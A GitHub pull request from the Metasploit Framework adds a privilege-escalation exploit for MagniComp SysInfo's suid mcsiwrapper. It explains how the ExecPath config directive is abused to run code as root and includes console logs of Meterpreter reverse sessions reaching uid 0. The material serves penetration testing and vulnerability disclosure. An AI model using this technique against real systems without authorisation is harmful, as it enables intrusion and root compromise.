Skip to content

/ metasploit-framework

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit #9504

Merged
merged 3 commits into from Feb 20, 2018
Merged

Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit #9504

merged 3 commits into from Feb 20, 2018

Conversation

@bcoles
Copy link
Contributor

bcoles commented Feb 5, 2018

Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit.

        This module attempts to gain root privileges on systems running
        MagniComp SysInfo versions prior to 10-H64.

        The .mcsiwrapper suid executable allows loading a config file using the
        '--configfile' argument. The 'ExecPath' config directive is used to set
        the executable load path. This module abuses this functionality to set
        the load path resulting in execution of arbitrary code as root.

        This module has been tested successfully with SysInfo version
        10-H63 on Fedora 20 x86_64 and 10-GA on Solaris 10u11 x86.

Verification

  • Start msfconsole
  • Get a session
  • use use multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1
session => 1
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Using target: Linux
[*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ...
[*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500
[+] Deleted /tmp/.0rk4PC/vFdxxuBVkh
[+] Deleted /tmp/.0rk4PC/eoGVzYwGa
[+] Deleted /tmp/.0rk4PC

meterpreter > getuid
Server username: uid=0, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
@bcoles
Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit
41dbae2
@bcoles bcoles added module docs labels Feb 5, 2018
@bcoles
Add documentation
Loading status checks…
ce6e85f
@Chiggins

This comment has been minimized.

Sign in to view
Copy link
Contributor

Chiggins commented Feb 7, 2018

If anyone doesn't mind, I'm going to self assign for my first PR as a committer. 💯
@Chiggins Chiggins self-assigned this Feb 7, 2018
@busterb

This comment has been minimized.

Sign in to view
Copy link
Member

busterb commented Feb 7, 2018

Go for it!
@Chiggins

This comment has been minimized.

Sign in to view
Copy link
Contributor

Chiggins commented Feb 7, 2018

Tested against Fedora 27 and it worked like a charm!

msf5 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 192.168.1.252:4445 
[*] Using target: Linux
[*] Writing '/tmp/.Duxko1/9M2WGR' (21 bytes) ...
[*] Writing '/tmp/.Duxko1/zuc5EBYz' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 192.168.1.162

meterpreter > sysinfo 
Computer     : fedora27.chigs.local
OS           : Fedora 27 (Linux 4.13.9-300.fc27.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid 
Server username: uid=0, gid=1000, euid=0, egid=1000
@bcoles
Update tested versions
Loading status checks…
1177efe
@Chiggins Chiggins merged commit 1177efe into rapid7:master Feb 20, 2018
1 check passed
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
Details
Chiggins added a commit that referenced this pull request Feb 20, 2018
@Chiggins
Lands #9504, MagniComp SysInfo privilege escalation
Verified
This commit was signed with a verified signature.
Chiggins Chris Higgins
GPG key ID: 2AFD4E81553BF115 Learn about signing commits
Loading status checks…
74c6e21
@bcoles bcoles deleted the bcoles:magnicomp_sysinfo_mcsiwrapper_priv_esc branch Feb 20, 2018
jmartin-r7 added a commit that referenced this pull request Feb 20, 2018
@Chiggins @jmartin-r7
Lands #9504, MagniComp SysInfo privilege escalation
Verified
This commit was signed with a verified signature.
jmartin-r7 Jeffrey Martin
GPG key ID: 0CD9BBC2AF15F171 Learn about signing commits
d2c203b
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@Chiggins Chiggins

Labels
docs module
Projects
None yet
Milestone
No milestone
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
@bcoles @Chiggins @busterb
You can’t perform that action at this time.